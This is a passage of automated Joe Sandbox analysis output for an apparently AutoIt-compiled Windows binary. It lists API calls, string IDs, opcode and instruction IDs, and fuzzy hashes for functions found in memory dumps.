• Opcode ID: 1d51b483f10d61eed2cfb0d4fa42976cb0b583cf9baf94be702fcb86c52801c5
• Instruction ID: d1cdcafac6bd518fafa9fa9b4cca568f41df371771a691f6e8635877e911806f
• Opcode Fuzzy Hash: 1d51b483f10d61eed2cfb0d4fa42976cb0b583cf9baf94be702fcb86c52801c5
• Instruction Fuzzy Hash: 5611223A900628BBDB22DB9CD944BBD77B8AB05754F060122EB85E72B0D3B0ED00C791
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00404DF5
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00404E1E
Strings
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
• Opcode ID: 5e3a917c8818176427d1357d564cc97d27d21a05a25243e5aabcc0542ab93bdc
• Instruction ID: d4b38fc1ba60aa77f583ba11f2768e3ab93b33640093434301541c70d1081515
• Opcode Fuzzy Hash: 5e3a917c8818176427d1357d564cc97d27d21a05a25243e5aabcc0542ab93bdc
• Instruction Fuzzy Hash: 5111CEB0500221FADB248F51C888EFBFAA8FF46350F10823BF20566280D3785941D6F4
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003E37A7
• ___raise_securityfailure.LIBCMT ref: 003E388E
Strings
Similarity
• API ID: FeaturePresentProcessor___raise_securityfailure
• String ID: (G
• API String ID: 3761405300-2483643444
• Opcode ID: 639bd6b539a3ae372a5f3c4a0ca7db6ebf650db84b69b112c6237bcb71e04b4b
• Instruction ID: 3dd35adeb2b665ba067b9a11e352462323cc01c3b6c0c8426fb9888e0214d45f
• Opcode Fuzzy Hash: 639bd6b539a3ae372a5f3c4a0ca7db6ebf650db84b69b112c6237bcb71e04b4b
• Instruction Fuzzy Hash: 3E21DDB5502704DAE710DF55EA856007BB5BB48310F20983AE90D8B3A0E3F4A9C0CF8E
APIs
• inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0040A84E
• htons.WSOCK32(00000000,?,00000000), ref: 0040A88B
Strings
Similarity
• API ID: htonsinet_addr
• String ID: 255.255.255.255
• API String ID: 3832099526-2422070025
• Opcode ID: 01d5254699725b55968b4d6abe7f1036c01df0f6c8dcb18a7c3ac883a275c569
• Instruction ID: d4418a55dc29d08890a61421d980e567cd4b21ec7e9d527c8c9a7438334c5c3c
• Opcode Fuzzy Hash: 01d5254699725b55968b4d6abe7f1036c01df0f6c8dcb18a7c3ac883a275c569
• Instruction Fuzzy Hash: 4D01C475600304ABCB11EF68D846FADB364EF44314F10953BF516AB3D1D775E812875A
APIs
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 003EB7EF
Strings
Similarity
• API ID: MessageSend
• String ID: ComboBox$ListBox
• API String ID: 3850602802-1403004172
• Opcode ID: 9517932f3740bf6437049482aa0fc9740e59b7d99693dce531c207c986011198
• Instruction ID: 42a566bebcb678845413b435001f473286ebcee2eaecd1ae8d61f43315eaf504
• Opcode Fuzzy Hash: 9517932f3740bf6437049482aa0fc9740e59b7d99693dce531c207c986011198
• Instruction Fuzzy Hash: 7001F171610164ABCB06EBA4CC42AFEB369AF46354B10071DF4726B2D2EBB059088B94
APIs
• SendMessageW.USER32(?,00000180,00000000,?), ref: 003EB6EB
Strings
Similarity
• API ID: MessageSend
• String ID: ComboBox$ListBox
• API String ID: 3850602802-1403004172
• Opcode ID: 19e6702e1fcf73ee95b14169ff93e18e8fed9a266bbcf7f63d24e3c52642f220
• Instruction ID: 0fdece635e70095cb63850193656bf000b87b9bf7881b16332c2c01159222b79
• Opcode Fuzzy Hash: 19e6702e1fcf73ee95b14169ff93e18e8fed9a266bbcf7f63d24e3c52642f220
• Instruction Fuzzy Hash: 7C018F71641054ABCB17EBA5C952BFFB3B89B06344B100129B502B71C1EB949F188BA5
APIs
• SendMessageW.USER32(?,00000182,?,00000000), ref: 003EB76C
Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 3850602802-1403004172
                                                                                • Opcode ID: 66b10371786c3ce6b3524d303b4c4ae94ca43bf255bffcd0055c024272000186
                                                                                • Instruction ID: dbc841a052969ac3bcab04eda6fde344ca7fa34960c68e192d804b75221542f6
                                                                                • Opcode Fuzzy Hash: 66b10371786c3ce6b3524d303b4c4ae94ca43bf255bffcd0055c024272000186
                                                                                • Instruction Fuzzy Hash: 3E01A275640154BBCB13E7A4CA02BFFB3AC9F05344B100119B501B75D2EBA49F1987B5
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: __calloc_crt
                                                                                • String ID: "G
                                                                                • API String ID: 3494438863-2872772239
                                                                                • Opcode ID: 4a2d1971cba56e72ac701c2de824896a273bc0b9486b7fdb8d436a435e7f6e84
                                                                                • Instruction ID: 71c010163d720531c0af4da9b8721ba6335d0e37e02ad92c2fd3fccc679e58f3
                                                                                • Opcode Fuzzy Hash: 4a2d1971cba56e72ac701c2de824896a273bc0b9486b7fdb8d436a435e7f6e84
                                                                                • Instruction Fuzzy Hash: 1DF0C2722496019BE7269F19BD516A667D6E704720B10817BF208CE397F7B0C8C18B99
                                                                                APIs
                                                                                • LoadImageW.USER32(003B0000,00000063,00000001,00000010,00000010,00000000), ref: 003B4048
                                                                                • EnumResourceNamesW.KERNEL32(00000000,0000000E,003F67E9,00000063,00000000,76C20280,?,?,003B3EE1,?,?,000000FF), ref: 004241B3
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: EnumImageLoadNamesResource
                                                                                • String ID: >;
                                                                                • API String ID: 1578290342-352282309
                                                                                • Opcode ID: afe88f9ceee58952c828d337f841cb04410cf1a0decb1e073c8805f2cf59483f
                                                                                • Instruction ID: 37b100b01560ef45af1f1c8b8e344beb6ce14b7595ce8899a8804c9905aa2572
                                                                                • Opcode Fuzzy Hash: afe88f9ceee58952c828d337f841cb04410cf1a0decb1e073c8805f2cf59483f
                                                                                • Instruction Fuzzy Hash: C5F06D31640364B7E2205B1ABC4BFD23BADE758BB5F104526F318AA5E0D2E090C08A98
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: ClassName_wcscmp
                                                                                • String ID: #32770
                                                                                • API String ID: 2292705959-463685578
                                                                                • Opcode ID: 53cf4244b9797241f681d618b30ed0327a848bbc6a3078112dee7fa47399b33d
                                                                                • Instruction ID: 2867f6102645ebbbc813b792ed779708e1f3242bdb765a629cedb7c59cb34458
                                                                                • Opcode Fuzzy Hash: 53cf4244b9797241f681d618b30ed0327a848bbc6a3078112dee7fa47399b33d
                                                                                • Instruction Fuzzy Hash: CDE06833A0032827D720EBA5EC0AF97FBACEB51760F000027F905D3041E670E60087E8
                                                                                APIs
                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 003EA63F
                                                                                  • Part of subcall function 003D13F1: _doexit.LIBCMT ref: 003D13FB
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Message_doexit
                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                • API String ID: 1993061046-4017498283
                                                                                • Opcode ID: 1431c79eb260a582db99bd4cb578de8f36a4c952dcd408311e5e9c162a75ce51
                                                                                • Instruction ID: a9631d17da9d33af3b1121f07bcd07bb668b286b2c5867a276809a93816e103b
                                                                                • Opcode Fuzzy Hash: 1431c79eb260a582db99bd4cb578de8f36a4c952dcd408311e5e9c162a75ce51
                                                                                • Instruction Fuzzy Hash: 4CD02B323C4B2833D31637983C07FC935488B05B95F140027FB0CD95C249E6D94002DD
                                                                                APIs
                                                                                • GetSystemDirectoryW.KERNEL32(?), ref: 0042ACC0
                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0042AEBD
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: DirectoryFreeLibrarySystem
                                                                                • String ID: WIN_XPe
                                                                                • API String ID: 510247158-3257408948
                                                                                • Opcode ID: 50209573a36ddf2947f1ec7d834a64c64dfe4b1cac18eb9f6cf9fbfb9be01dd4
                                                                                • Instruction ID: f53a7fd3571eef416ea6af61cc0ce0670dac25354bc2149872936f4a2990821a
                                                                                • Opcode Fuzzy Hash: 50209573a36ddf2947f1ec7d834a64c64dfe4b1cac18eb9f6cf9fbfb9be01dd4
                                                                                • Instruction Fuzzy Hash: AFE06D70D00619DFCB11DBA6E944AEDB7B8AF48300F5080A6E402B2260CB745A94DF2A
                                                                                APIs
                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004186E2
                                                                                • PostMessageW.USER32(00000000), ref: 004186E9
                                                                                  • Part of subcall function 003F7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003F7AD0
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: FindMessagePostSleepWindow
                                                                                • String ID: Shell_TrayWnd
                                                                                • API String ID: 529655941-2988720461
                                                                                • Opcode ID: bd63150b384b28ca141146d8eaee411aaa86bf98669bb1615ceecc856683b0e6
                                                                                • Instruction ID: ac10161cc0b67a44e2d71bc620bcf6d8465510a23cd8df1860799e0db07847de
                                                                                • Opcode Fuzzy Hash: bd63150b384b28ca141146d8eaee411aaa86bf98669bb1615ceecc856683b0e6
                                                                                • Instruction Fuzzy Hash: 33D02231B803187BF3246730AC0BFC63A189B04B11F101825B306EB1C0C9E0E900C71C
                                                                                APIs
                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004186A2
                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 004186B5
                                                                                  • Part of subcall function 003F7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003F7AD0
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: FindMessagePostSleepWindow
                                                                                • String ID: Shell_TrayWnd
                                                                                • API String ID: 529655941-2988720461
                                                                                • Opcode ID: ed7cab2c9ce31062917cbf922cb89644ae41312dca29b0ca726039f92b1f9538
                                                                                • Instruction ID: e9e68aca34aad13ba6e34f457963c29a483bcaced30748a834b5887c3c26ebc8
                                                                                • Opcode Fuzzy Hash: ed7cab2c9ce31062917cbf922cb89644ae41312dca29b0ca726039f92b1f9538
                                                                                • Instruction Fuzzy Hash: 10D01231B84358B7E7646770AC0BFD67E589B04B11F111825B74AAB1D0C9E4E950C758